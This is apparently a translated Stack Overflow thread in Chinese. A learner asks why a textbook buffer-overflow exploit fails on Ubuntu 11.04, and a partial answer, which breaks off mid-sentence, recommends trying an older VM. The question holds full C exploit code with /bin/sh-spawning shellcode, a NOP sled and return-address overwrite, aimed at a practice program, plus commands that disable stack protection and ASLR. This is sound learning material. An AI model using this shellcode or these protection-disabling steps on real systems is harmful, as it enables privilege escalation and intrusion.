在Ubuntu 11.04中禁用堆栈粉碎保护

Question

我在2007 MacBook上运行32位Ubuntu 11.04,我刚刚开始学习缓冲区溢出漏洞.我试图从一本书中运行示例程序,但Ubuntu的安全措施使我无法成功执行缓冲区溢出.这是我试图运行的代码:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}

我希望这段代码能够导致段错误,但每次运行它都会退出并显示错误"stack smashing detected".我尝试使用以下选项编译(使用gcc):

-fno-stack-protector -D_FORTIFY_SOURCE=0 -z execstack

各种组合,以及所有组合.我也尝试过$ sysctl -w kernel.randomize_va_space=0重新编译,但没有成功.

鉴于Ubuntu的内置安全措施,如果有人能够阐明执行缓冲区溢出的正确方法,将不胜感激

Answer 1

我对现在发生的事情了解得更多.给定的代码构造一个缓冲区,然后将其传递给一个名为notesearch的程序,该程序具有缓冲区溢出漏洞.我没有弄清楚如何在当前版本的ubuntu上禁用保护措施,但我尝试的方法可以在我的Ubuntu 9.10虚拟机上运行.也就是说,-fno-stack-protector作为gcc标志工作,当与sysctl kernel.randomize_va_space = 0配对时,允许在堆栈上执行shellcode的缓冲区溢出.一些解决方法,但运行我的VM很适合我,并允许我继续阅读本书中的示例.如果你对学习漏洞感兴趣,这是一本很棒的书.这里是